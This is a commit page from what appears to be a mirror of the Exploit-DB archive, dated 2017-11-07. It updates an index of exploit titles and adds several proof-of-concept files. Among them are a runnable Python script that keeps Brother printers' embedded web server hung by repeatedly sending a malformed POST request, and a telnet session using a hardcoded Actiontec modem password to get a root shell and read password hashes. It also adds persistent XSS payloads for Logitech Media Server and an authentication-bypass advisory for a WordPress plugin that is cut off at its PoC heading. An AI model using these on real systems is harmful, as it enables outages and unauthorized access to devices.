bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-11-07

Browse source 
9 new exploits

G Data TotalCare 2011 - NtOpenKey Race Condition
G Data TotalCare 2011 - 'NtOpenKey' Race Condition

QNX 6.1 - TimeCreate Local Denial of Service
QNX 6.1 - 'TimeCreate' Local Denial of Service
Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)
Debut Embedded httpd 1.20 - Denial of Service
Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow
SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)

PHP 5.3.0 - pdflib Arbitrary File Write
PHP 5.3.0 - 'pdflib' Arbitrary File Write
Actiontec C1000A Modem - Backdoor Account
Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)

Joomla! Component com_virtuemart 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit)
Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)

Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection
Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection

Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection
Joomla! 2.5.0 < 2.5.1 - Blind SQL Injection

xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection
xt:Commerce 3.04 SP2.1 - Blind SQL Injection

MyBB 1.6.9 - 'editpost.php?posthash' Time Based SQL Injection
MyBB 1.6.9 - 'editpost.php?posthash' Blind SQL Injection

Tableau Server - Blind SQL Injection
Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection

GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection
GeoCore MAX DB Ver. 7.3.3 - Blind SQL Injection

Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection
Joomla! 2.5.1 - 'redirect.php' Blind SQL Injection

Milw0rm Clone Script 1.0 - Time Based SQL Injection
Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection

Milw0rm Clone Script 1.0 - Authentication Bypass
Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass

RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections
RealtyScript 4.0.2 - Multiple Blind SQL Injections
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass
Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting
Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-11-07 05:01:33 +00:00
parent 1b68675830
commit 6f7af333ff
10 changed files with 552 additions and 14 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

37
files.csv
View file

@ -1794,7 +1794,7 @@ id,file,description,date,author,platform,type,port
15434,platforms/windows/dos/15434.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15435,platforms/windows/dos/15435.html,"LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0
15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - 'NtOpenKey' Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0
15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0
15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0
15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0
@ -2732,7 +2732,7 @@ id,file,description,date,author,platform,type,port
21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",hardware,dos,0
21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0
21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0
21984,platforms/unix/dos/21984.c,"QNX 6.1 - TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
21984,platforms/unix/dos/21984.c,"QNX 6.1 - 'TimeCreate' Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
21986,platforms/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos,0
21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0
@ -5725,6 +5725,10 @@ id,file,description,date,author,platform,type,port
43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0
43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0
43111,platforms/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,multiple,dos,0
43115,platforms/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",windows,dos,0
43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0
43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0
43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6612,7 +6616,7 @@ id,file,description,date,author,platform,type,port
9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Privilege Escalation",2009-09-17,Rick,linux,local,0
9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0
9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - 'pdflib' Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0
9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 - VFS/devfs Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0
@ -15937,6 +15941,8 @@ id,file,description,date,author,platform,type,port
43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
43105,platforms/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",hardware,remote,0
43112,platforms/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote,0
43118,platforms/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",hardware,remote,0
43121,platforms/windows/remote/43121.txt,"Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -25611,7 +25617,7 @@ id,file,description,date,author,platform,type,port
17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0
17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0
17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0
17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
17584,platforms/php/webapps/17584.php,"cFTP 0.1 - 'r80' Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0
17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Cross-Site Scripting Multiple Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
@ -25877,7 +25883,7 @@ id,file,description,date,author,platform,type,port
18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - 'translate.php' Remote Code Execution",2011-11-19,EgiX,php,webapps,0
18114,platforms/php/webapps/18114.txt,"WordPress Plugin AdRotate 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0
18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0
18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0
18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0
18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps,0
18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - 'ajax_save_name.php' Remote Code Execution",2011-11-16,EgiX,php,webapps,0
18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0
@ -26072,7 +26078,7 @@ id,file,description,date,author,platform,type,port
18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0
18583,platforms/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,php,webapps,0
18616,platforms/php/webapps/18616.txt,"Pre Printing Press - 'product_desc.php?pid' SQL Injection",2012-03-18,"Easy Laster",php,webapps,0
18618,platforms/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection",2012-03-19,"A. Ramos",php,webapps,0
18618,platforms/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Blind SQL Injection",2012-03-19,"A. Ramos",php,webapps,0
18589,platforms/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0
18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
18590,platforms/php/webapps/18590.txt,"PBLang Bulletin Board System - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0
@ -26411,7 +26417,7 @@ id,file,description,date,author,platform,type,port
20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0
20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0
20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0
20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0
20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0
20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",php,webapps,0
@ -27404,7 +27410,7 @@ id,file,description,date,author,platform,type,port
23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps,0
23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak & BackSpace",php,webapps,0
23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple SQL Injections",2004-03-01,"Alnitak & BackSpace",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Blind SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0
24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - 'blocker_query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-23,waraxe,php,webapps,0
@ -32616,7 +32622,7 @@ id,file,description,date,author,platform,type,port
32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0
31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880
31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80
31578,platforms/windows/webapps/31578.txt,"Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80
31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0
31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
31581,platforms/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0
@ -33505,7 +33511,7 @@ id,file,description,date,author,platform,type,port
33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0
33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution",2014-04-28,LOTFREE,php,webapps,80
33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80
33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80
33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Blind SQL Injection",2014-04-28,Esac,php,webapps,80
33076,platforms/php/webapps/33076.txt,"WordPress Plugin iMember360 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80
33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0
33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0
@ -35826,7 +35832,7 @@ id,file,description,date,author,platform,type,port
36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0
36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments?topicID' SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps?id' SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection",2012-03-05,"Colin Wong",php,webapps,0
36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Blind SQL Injection",2012-03-05,"Colin Wong",php,webapps,0
36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - Local File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps,0
36973,platforms/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0
36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0
@ -36061,7 +36067,7 @@ id,file,description,date,author,platform,type,port
37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,php,webapps,0
37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0
37353,platforms/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - Time Based SQL Injection",2015-06-09,Pancaker,php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,php,webapps,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37238,platforms/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@ -36101,7 +36107,7 @@ id,file,description,date,author,platform,type,port
37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0
37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' & 1=1--",php,webapps,0
37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - '/admin/login.php' Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
37331,platforms/php/webapps/37331.py,"WHMCompleteSolution (WHMCS) - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0
@ -36753,7 +36759,7 @@ id,file,description,date,author,platform,type,port
38491,platforms/php/webapps/38491.php,"SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0
38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0
38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps,0
38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps,0
@ -38808,3 +38814,6 @@ id,file,description,date,author,platform,type,port
43110,platforms/php/webapps/43110.txt,"WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection",2017-11-03,"Lenon Leite",php,webapps,0
43113,platforms/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",xml,webapps,0
43114,platforms/java/webapps/43114.py,"Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity",2017-05-17,"Charles Fol",java,webapps,0
43117,platforms/php/webapps/43117.txt,"WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass",2017-11-04,"Colette Chamberland",php,webapps,0
43122,platforms/multiple/webapps/43122.txt,"Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0

Can't render this file because it is too large.

54
platforms/hardware/dos/43119.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Remote un-authenticated DoS in Debut embedded httpd server in Brother printers
# Date: 11/02/2017
# Exploit Author: z00n (@0xz00n)
# Vendor Homepage: http://www.brother-usa.com
# Version: <= 1.20
# CVE : CVE-2017-16249
#
#Description:
#The Debut embedded http server contains a remotely exploitable denial of service where a single malformed HTTP POST request can cause the server to hang until eventually replying with an HTTP 500 error. While the server is hung, print jobs over the network are blocked and the web interface is inaccessible. An attacker can continuously send this malformed request to keep the device inaccessible to legitimate traffic.
#
#Remediation Steps:
#No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
#
#Disclosure Attempts:
#09/11/2017 - Attempt to contact vendor
#10/03/2017 - Live chat communications with vendor regarding no reply
#10/25/2017 - Attempt to contact vendor
#11/02/2017 - Advisory published
#
#Proof of Concept:
#!/usr/bin/python
import socket
import sys
target = raw_input("[*] Enter target IP or hostname: ")
port = raw_input("[*] Enter target port: ")
payload = "POST / HTTP/1.1\r\n"
payload += "Host: asdasdasd\r\n"
payload += "User-Agent: asdasdasd\r\n"
payload += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
payload += "Accept-Language: en-US,en;q=0.5\r\n"
payload += "Referer: asdasdasdasd\r\n"
payload += "Connection: close\r\n"
payload += "Upgrade-Insecure-Requests: 1\r\n"
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: 42\r\n"
payload += "asdasdasdasdasdasdasd\r\n\r\n"
print "[*] Starting DOS. Payload will be sent every time the server responds."
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target,int(port)))
print "[*] Sending DOS payload"
s.send(payload)
# Wait for server to respond with 500 error
s.recv(4096)
s.close()
except:
print("[!] Can't connect to target")
sys.exit()

32
platforms/hardware/remote/43118.txt Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Actiontec C1000A backdoor account
# Google Dork: NA
# Date: 11/04/2017
# Exploit Author: Joseph McDonagh
# Vendor Homepage: https://actiontecsupport.zendesk.com/hc/en-us
# Software Link: N/A Hardware
# Version: Firmware CAC003-31.30L.86
# Tested on: Linux
# CVE : NA
# The Actiontec C1000A Modem provided by CenturyLink has hardcoded passwords. This is similar to another recent submission by Matthew Shiemo, who inspired me to check the device I use.
# Proof of Concept
$ telnet 192.168.0.1
===Actiontec xDSL Router===
Login: admin
Password: CenturyL1nk
> sh
BusyBox v1.17.2 (2015-10-30 10:34:29 CST built-in shell (ash)
Enter 'help' for a list of build-in commands
# cat /etc/passwd
admin:Rtqa.nQhYPBRo:0:0:Administratir:/:/bin/sh
support:vmiTSa8ukDkOY:0:0:Technical Support:/:/bin/sh
user:Fq10qi6QmLmmY:0:0:Normal User:/:/bin/sh
nobody:rZy3YulyLvuYU:0:0:nobody for ftp:/bin/sh
# cat /proc/version
Linux version 2.6.30 (waye@hugh-PowerEdge-R220.home) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015
# cat /etc/group
root::0:root,admin,support,user

19
platforms/multiple/webapps/43122.txt Executable file
View file

@ -0,0 +1,19 @@
# Exploit Title: Logitech Media Server : Persistent Cross Site Scripting(XSS)
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Software Link: [download link if available]
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
POC:
Access and go to the favorites tab and add a new favorite.
Add script as the value of the field.
Payload : <script> alert(1)</script>
Script saved and gives a pop-up to user every time they access that page.
Therefore, Persistent XSS.

18
platforms/multiple/webapps/43123.txt Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: Logitech Media Server : HTML code injection and execution.
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
 
 
 
POC:
 
1. Access and go to the Radio URL tab and add a new URL.
2. Add script as the value of the field.
3. Payload : <script> alert(1)</script>
4. Script saved and gives an image msg with a javascript execution on image click.
5. Therefore, Persistent XSS.

30
platforms/php/webapps/43117.txt Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: Userpro WordPress Plugin Authentication Bypass
# Google Dork: inurl:/plugins/userpro
# Date: 11.04.2017
# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Version: <= 4.6.17
# Tested on: Wordpress 4.8.3
# CVE : requested, not assigned yet.
Description
================================================================================
The userpro plugin has the ability to bypass login authentication for the user
'admin'. If the site does not use the standard username 'admin' it is not affected.
PoC
